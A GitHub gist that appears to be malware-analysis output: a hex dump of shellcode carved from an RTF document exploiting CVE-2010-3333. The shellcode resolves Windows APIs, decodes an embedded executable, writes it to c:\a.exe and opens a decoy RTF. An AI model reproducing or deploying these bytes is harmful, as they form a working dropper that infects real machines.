Created
March 31, 2015 01:23
-
-
Save jwieder/dd91def41510d028cd4e to your computer and use it in GitHub Desktop.
Output of rtf-carver.py used on CVE-2010-3333 exploited RTF file
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 0000000: 0123 4567 ff03 0000 0000 0000 0000 0000 .#Eg............ | |
| 0000010: 0000 0000 0000 0000 0000 1245 fa7f 0000 ...........E.... | |
| 0000020: 807c 0000 807c bbbb bbbb cccc cccc dddd .|...|.......... | |
| 0000030: dddd 906a 887c 9090 9090 64a1 3000 0000 ...j.|....d.0... | |
| 0000040: 8b40 0c8b 701c ad8b 7008 e9f4 0200 0058 .@..p...p......X | |
| 0000050: 81ec 0003 0000 8bfc 5033 c0b9 0003 0000 ........P3...... | |
| 0000060: f3aa 588b fc89 7708 8947 10ff 7708 68ec ..X...w..G..w.h. | |
| 0000070: 9703 0ce8 7702 0000 8947 1cff 7708 68f6 ....w....G..w.h. | |
| 0000080: 22b9 7ce8 6702 0000 8947 20ff 7708 68a5 ".|.g....G .w.h. | |
| 0000090: 1700 7ce8 5702 0000 8947 24ff 7708 68fb ..|.W....G$.w.h. | |
| 00000a0: 97fd 0fe8 4702 0000 8947 28ff 7708 6816 ....G....G(.w.h. | |
| 00000b0: 65fa 10e8 3702 0000 8947 2cff 7708 681f e...7....G,.w.h. | |
| 00000c0: 790a e8e8 2702 0000 8947 30ff 7708 6825 y...'....G0.w.h% | |
| 00000d0: b0ff c2e8 1702 0000 8947 34ff 7708 68ac .........G4.w.h. | |
| 00000e0: 08da 76e8 0702 0000 8947 38ff 7708 6898 ..v......G8.w.h. | |
| 00000f0: fe8a 0ee8 f701 0000 8947 3cff 7708 687e .........G<.w.h~ | |
| 0000100: d8e2 73e8 e701 0000 8947 44ff 7708 68ad ..s......GD.w.h. | |
| 0000110: 9b7d dfe8 d701 0000 8947 48ff 7708 6876 .}.......GH.w.hv | |
| 0000120: 6db0 45e8 c701 0000 8947 4cff 7708 6833 m.E......GL.w.h3 | |
| 0000130: ca8a 5be8 b701 0000 8947 508d 8700 0100 ..[......GP..... | |
| 0000140: 0068 0001 0000 506a 00ff 574c 8d87 0001 .h....Pj..WL.... | |
| 0000150: 0000 4080 3800 75fa 66c7 0020 2240 4089 ..@.8.u.f.. "@@. | |
| 0000160: 4758 5068 0001 0000 ff57 5057 8dbf 0001 GXPh.....WPW.... | |
| 0000170: 0000 4780 3f00 75fa e9d4 0100 005e acaa ..G.?.u......^.. | |
| 0000180: 3c00 75fa 5f89 7740 ff77 10ff 5734 ff77 <.u._.w@.w..W4.w | |
| 0000190: 58ff 5734 33f6 468d 4760 5056 ff57 4883 X.W43.F.G`PV.WH. | |
| 00001a0: f8ff 74f2 3d00 1000 0076 eb89 4704 8977 ..t.=....v..G..w | |
| 00001b0: 60ff 7704 6a40 ff57 1c89 475c 6a00 6a00 `.w.j@.W..G\j.j. | |
| 00001c0: 6a00 ff77 60ff 5738 83f8 ff74 4b6a 008d j..w`.W8...tKj.. | |
| 00001d0: 5f70 53ff 7704 ff77 5cff 7760 ff57 2c8b _pS.w..w\.w`.W,. | |
| 00001e0: 4f70 83e9 108b 475c 4081 3858 5858 5875 Op....G\@.8XXXXu | |
| 00001f0: 0981 7804 5959 5959 7404 e2ec eb1a 83c0 ..x.YYYYt....... | |
| 0000200: 0889 4714 4081 3859 5959 5975 0981 7804 ..G.@.8YYYYu..x. | |
| 0000210: 5858 5858 740e e2ec ff77 5cff 5720 0f85 XXXXt....w\.W .. | |
| 0000220: 72ff ffff 83c0 0889 4718 6a00 6880 0000 r.......G.j.h... | |
| 0000230: 006a 026a 006a 0068 0000 0040 ff77 10ff .j.j.j.h...@.w.. | |
| 0000240: 5724 8947 64c7 476c 4d5a 9000 6a00 8d5f W$.Gd.GlMZ..j.._ | |
| 0000250: 7053 6a04 8d5f 6c53 ff77 64ff 5730 8b47 pSj.._lS.wd.W0.G | |
| 0000260: 182b 4714 83e8 088b 5f14 3003 4348 83f8 .+G....._.0.CH.. | |
| 0000270: 0075 f76a 008d 5f70 538b 4714 ff30 83c0 .u.j.._pS.G..0.. | |
| 0000280: 0450 ff77 64ff 5730 ff77 64ff 5728 6a00 .P.wd.W0.wd.W(j. | |
| 0000290: 6880 0000 006a 026a 006a 0068 0000 0040 h....j.j.j.h...@ | |
| 00002a0: ff77 58ff 5724 8947 546a 008d 5f70 538b .wX.W$.GTj.._pS. | |
| 00002b0: 4714 8b5f 182b d883 eb04 2b18 5383 c004 G.._.+....+.S... | |
| 00002c0: 0340 fc50 ff77 54ff 5730 ff77 54ff 5728 .@.P.wT.W0.wT.W( | |
| 00002d0: 8d47 40c6 0022 6a00 8d87 0001 0000 50ff .G@.."j.......P. | |
| 00002e0: 573c 6a00 ff77 10ff 573c 6a00 ff57 4455 W<j..w..W<j..WDU | |
| 00002f0: 8bec 578b 7d08 8b5d 0c56 8b73 3c8b 741e ..W.}..].V.s<.t. | |
| 0000300: 7803 f356 8b76 2003 f333 c949 41ad 03c3 x..V.v ..3.IA... | |
| 0000310: 5633 f60f be10 3af2 7408 c1ce 0d03 f240 V3....:.t......@ | |
| 0000320: ebf1 3bfe 5e75 e55a 8beb 8b5a 2403 dd66 ..;.^u.Z...Z$..f | |
| 0000330: 8b0c 4b8b 5a1c 03dd 8b04 8b03 c55e 5f5d ..K.Z........^_] | |
| 0000340: c208 00e8 07fd ffff 633a 5c61 2e65 7865 ........c:\a.exe | |
| 0000350: 00e8 27fe ffff 5472 6970 6f6c 6974 616e ..'...Tripolitan | |
| 0000360: 6961 2e72 7466 0000 0000 0000 0000 0000 ia.rtf.......... | |
| 0000370: 0000 0000 0000 0000 0000 0000 0000 0000 ................ | |
| 0000380: 0000 0000 0000 0a ....... |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment